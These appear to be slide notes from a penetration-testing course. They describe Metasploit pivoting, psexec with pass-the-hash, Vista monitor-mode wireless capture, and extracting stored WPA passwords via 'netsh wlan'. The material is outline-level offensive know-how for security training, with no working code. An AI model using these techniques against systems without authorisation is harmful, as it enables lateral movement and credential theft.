Penetration testing Part 2

Let’s build on the concept of combined testing

We’ll discuss useful new tools and techniques, We’ll look at how these concepts can be used in a network/wireless/web app combined pen test

Today’s Focus

• In Part 1, the flow was 1) wireless 2) web app 3) network exploitation
• To illustrate the pragmatic and iterative nature of combined tests, we’ll alter the order this time:
• Network exploitation – Useful Metasploit features (Metasploit’s builtin route command, psexec exploit, and its pass-the-hash features)
• Wireless attack – Vista wireless power tools (including VistaRFMON)
• Web App attack – Discovery and exploitation (using w3af)

Network Attack Tools and Techniques

Metasploit’s Route Command

Metasploit includes many server-side and client-side exploits

• Use Metasploit 3.x “route” command to pivot through already-exploited host

– Carries follow-on exploits and payloads across Meterpreter session

– Don’t confuse this with the Meterpreter “route” command

Metasploit’s psexec Feature

• Remember the great free psexec tool from Microsoft SysInternals?

– Allows user with admin credentials to make a remote Windows box run a

command via SMB connections

• Metasploit includes a psexec exploit with very similar features
• A pen tester can use one compromised Windows machine to cause another machine to run cmd.exe for a nice little pivot
• First, exploit victim1 with exploit1 and Meterpreter payload, then…

Metasploit’s Integrated Pass-the-Hash

• Metasploit psexec has built-in pass-the-hash capability!

– Instead of configuring psexec with the admin name and password,

just configure it with the admin name and hash dumped using priv

• First, exploit victim1 with exploit1 and Meterpreter payload, then…

Wireless Attack Tools and Technique

Vista Wireless Power Tools

Vista introduces all-new wireless stack

– Lots of new and powerful features

• NDIS 6 requires wireless drivers to support

monitor-mode packet capture

– Previously limited to Linux or commercial drivers

• Unfortunately, not exposed in any built-in applications

Capturing Vista Wireless Traffic

• With RFMON capture, attacker uses Vista host to discover and attack nets

– It's like having a remote Linux box, sort of

• Packet capture supplied by Microsoft NetMon 3.2

– Silent command-line install and capture… no reboot

• Attacker can enumerate, analyze and attack wireless networks seen by victim
• No attack tools read NetMon WLAN captures
• Solution: nm2lp

– Converts Netmon WLAN captures to libpcap format

Leveraging Vista “netsh wlan”

• Attacker can extract useful Vista WLAN config data

– WPA/2-PSK passwords, configuration settings,preferred networks, certificate store, etc.

• Can also establish new networks

– Ad-Hoc interfaces, bridged to Ethernet interfaces (requires 3rd party tool nethelper.exe w/o GUI)

– Layer 2 connection for local WLAN attacker.